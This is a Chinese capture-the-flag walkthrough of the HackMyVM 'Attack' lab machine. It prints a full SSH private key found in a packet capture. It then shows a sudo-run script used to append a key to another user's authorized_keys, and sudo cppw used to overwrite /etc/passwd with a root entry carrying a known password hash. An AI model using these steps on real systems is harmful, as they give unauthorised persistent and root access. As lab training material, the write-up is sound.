16. attack
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Attack
作者作者:sml
难度:⭐️⭐️
知识点:cppw命令(替换/etc/passwd)
2. 信息收集
Nmap scan report for 10.16.21.183
Host is up (0.00012s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
2.1. 目录扫描
首页
根据提示可以知道,存在一个capture名字的流量包,但是后缀不知道是什么了
capture.pcap
capture.pcapng
capture.cap
capture.log
capture.ncap
capture.etl
capture.pkt
capture.trace
capture.zip
capture.7z
capture.rar
capture.tar.gz
url拼接尝试一下
第一个就是的
2.2. 流量包分析
流量包很简单一共就两个流
导出对象可以获取到一共图片
扫描二维码可以获取到一个文件
http://localhost/jackobattack.txt
访问获取到一个私钥
Hey jackob, you will need this:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAt1O2ZANL3BPkL32RqWk3ONGDYkw58GyD2rqK0RDRblATgo+9+Vpy
wpavGbvNGF1aph9Mf+Tmn6b95yQ6GiAaDUrtiRJXLR1/27Facslk8grW+/uBFVou4vBLB6
exY/+mbsBZxy54RiKp2WVZ3oKOgQ3ybEWX9BVGp0dRdp16GJmyDVcAMR+g4dc/J0Ee59X8
hKlV6MCmGkTZ1/Bn/CCzwztt3HqTVCK/86cQdzGGYeNDSUKUYYE51Ym00PLb8yhJBelJhR
udo+59dLLdGcyQMiCDbBnO7b/RbhRHUnjuuZHaVmkAGs4FBwahDza1QYMp1Fs1sjbDh0I+
trm4Vci2qQAAA8gBP1jWAT9Y1gAAAAdzc2gtcnNhAAABAQC3U7ZkA0vcE+QvfZGpaTc40Y
NiTDnwbIPauorRENFuUBOCj735WnLClq8Zu80YXVqmH0x/5Oafpv3nJDoaIBoNSu2JElct
HX/bsVpyyWTyCtb7+4EVWi7i8EsHp7Fj/6ZuwFnHLnhGIqnZZVnego6BDfJsRZf0FUanR1
F2nXoYmbINVwAxH6Dh1z8nQR7n1fyEqVXowKYaRNnX8Gf8ILPDO23cepNUIr/zpxB3MYZh
40NJQpRhgTnVibTQ8tvzKEkF6UmFG52j7n10st0ZzJAyIINsGc7tv9FuFEdSeO65kdpWaQ
AazgUHBqEPNrVBgynUWzWyNsOHQj62ubhVyLapAAAAAwEAAQAAAQB79EYmaXQpYemvkp+i
hFmqOT80f4XNYhHlGqwxn8V7aPlIFhjFOLrPh0Lti2WpS7W3DQKUlxi4ahjS6FPAxmPXCQ
qC27vF7WQ+DzSw2CtA3MNvrSYiYc/B8edJTcFLc9f8mmIZovn/sgBV1YlmQbBI4j0/p+6O
QrR69mXGZcPgTSSA73N/eR92Bd5AB4e5PI9Io7Ib/GKUgDtilkGhElJ5EHVq0jVxTWq6lP
WnYm4NIX8Rt3+cOX01ohTDKetbrULrVYqcSPLHLgUjskghP8XqTYwy02LJQoTggHgAKFqt
3M5x5C798R2lHGvTZKkLHeTUzHvcjb+uLun+fFCPSuABAAAAgAVc3cUkXUPGpfzeB7A2CZ
Dq0Vy+auMPGMdQSbYg5GgZhwZzPeGKXWx7a6oVvKvxQ33tGXph6u2Nf9Xz3AIar7vVmoJb
TbpngEMxLcsM1DUT1rORcat+G5g0SVUQRssA8+xT+rxx0n0qnJSjMrxYsnu1FPw8iwCt6g
oLAUKk2RqiAAAAgQDzQ9b9CdPD81PXjOEvW+xgT2r16zarfR+3jZjuf7xEHy7PUIE4mV1r
L3Ap2WRtwEOg+izTfBPJCegDognPWHsqLkgNtPZ4wDwbnfrL//zPNVZkZsknxe6wnZ3gvv
jG0IttS7fPqk+XZ6rwAjYUBkUBCGZlWb5lhSRHQcL3fU1IgQAAAIEAwOyaSNsmJ88xb5xf
+75biKyPhHVAaJtfXnMYo+rsHGIUZIZKmok1em8VTJgGAUs+yJrYF2TvlNmvlv5jrGSNPQ
Tf0wbkfaxG8n2FqtjIpCK222bt5kMZ1uULczCjitOVQpNAFt5mJKeqWUjOLj409luMFKY+
zTtL5/FYdo2LGikAAAANamFja29iQGF0dGFjawECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
应该jackob
利用私钥连接上去
HMVattackstarted
3. 提权
看下提示
jackob@attack:~$ cat note.txt
I need to launch the script to start the attack planned by kratos
我需要启动脚本以开始 Kratos 计划的攻击
jackob@attack:~$ ls -la
total 48
drwxr-xr-x 5 jackob jackob 4096 Nov 16 07:09 .
drwxr-xr-x 5 root root 4096 Jan 7 2021 ..
-rwxrwxr-- 1 kratos kratos 1023 Jan 10 2021 attack.sh
-rw-r--r-- 1 jackob jackob 220 Jan 7 2021 .bash\_logout
-rw-r--r-- 1 jackob jackob 3526 Jan 7 2021 .bashrc
drwx------ 3 jackob jackob 4096 Nov 16 07:09 .config
-rwx--x--x 1 jackob jackob 1920 Jan 7 2021 flag.sh
drwxr-xr-x 3 jackob jackob 4096 Jan 7 2021 .local
-rw-r--r-- 1 jackob jackob 67 Jan 7 2021 note.txt
-rw-r--r-- 1 jackob jackob 807 Jan 7 2021 .profile
drwx------ 2 jackob jackob 4096 Jan 7 2021 .ssh
-rw------- 1 jackob jackob 17 Jan 7 2021 user.txt
先看下flag.sh
里面就是user.txt内容
jackob@attack:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
jackob@attack:~$ sudo -l
Matching Defaults entries for jackob on attack:
!env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jackob may run the following commands on attack:
(kratos) NOPASSWD: /home/jackob/attack.sh
意思是我们当前jackob用户可以以kratos的权限执行/home/jackob/attack.sh
jackob@attack:~$ cat attack.sh
#!/bin/bash
echo "[+] LAUNCHING ATTACK"
the9command="/usr/bin/id"
the2command="/usr/bin/ls"
the4command="/usr/bin/echo"
the3command="/usr/bin/uptime"
theOcommand="/usr/bin/echo"
the1command="/usr/bin/id"
the6Command="/usr/bin/echo"
the7command="/usr/bin/w"
the8command="/usr/bin/echo"
the5command="/usr/bin/id"
echo "[+] NEXT PHASE"
the10command="/usr/bin/id"
the20command="/usr/bin/echo"
the30command="/usr/bin/echo"
the40command="/usr/bin/w"
the50command="/usr/bin/echo"
the60command="/usr/bin/date"
the70command="/usr/bin/uptime"
the85command="/usr/bin/echo"
echo "[+] FINAL PHASE"
$the1command >> /tmp/a
$the2command >> /tmp/a
$the3command >> /tmp/b
$the4command >> /tmp/b
$the5command >> /tmp/c
$the6command >> /tmp/c
$the7command >> /tmp/d
$the8command >> /tmp/d
$the9command >> /tmp/f
$the0command >> /tmp/f
$the10command >> /tmp/g
$the20command >> /tmp/g
$the30command >> /tmp/h
$the40command >> /tmp/h
$the50command >> /tmp/r
$the60command > /tmp/r
$the70command > /tmp/w
$the85command > /tmp/z
echo "[+] DONE"
在用户teste目录下可以获取到一个mysecret.png
常见的几种解密发现都没有啥东西
还是把重心放到这个attack.sh上
我们修改掉这个attack.sh的内容
直接把jackob的公钥写进去
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3U7ZkA0vcE+QvfZGpaTc40YNiTDnwbIPauorRENFuUBOCj735WnLClq8Zu80YXVqmH0x/5Oafpv3nJDoaIBoNSu2JElctHX/bsVpyyWTyCtb7+4EVWi7i8EsHp7Fj/6ZuwFnHLnhGIqnZZVnego6BDfJsRZf0FUanR1F2nXoYmbINVwAxH6Dh1z8nQR7n1fyEqVXowKYaRNnX8Gf8ILPDO23cepNUIr/zpxB3MYZh40NJQpRhgTnVibTQ8tvzKEkF6UmFG52j7n10st0ZzJAyIINsGc7tv9FuFEdSeO65kdpWaQAazgUHBqEPNrVBgynUWzWyNsOHQj62ubhVyLap jackob@attack" >> /home/kratos/.ssh/authorized\_keys
sudo -u kratos /home/jackob/attack.sh
然后就可以用jackob的私钥连接kratos用户
4. 再提权
检测提权
kratos@attack:~$ sudo -l
Matching Defaults entries for kratos on attack:
!env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kratos may run the following commands on attack:
(root) NOPASSWD: /usr/sbin/cppw
cppw命令可以用于覆盖/etc/passwd
这里我尼玛玩坏了。。。
不能瞎复制啊
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
\_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
teste:x:1000:1000:teste,,,:/home/teste:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin
jackob:x:1001:1001:,,,:/home/jackob:/bin/bash
kratos:x:1002:1002:,,,:/home/kratos:/bin/bash
HMVattackr00t
5. 拓展
这里讲一下
/etc/passwd里面的root是
root:x:0:0:root:/root:/bin/bash
其中x 表示这个密码没有存储在passwd里面 存储在/etc/shadow里面
我们将x替换成我们已知的加密密码即可
但这个密码的加密方式应该是需要相同的
root:$y$j9T$G45VwieJUJvz8NXVR3/CE0$UVbcsJfoy/tK5mlf59P4255orDTFnpTy6JsIodTjo12:0:0:root:/root:/bin/bash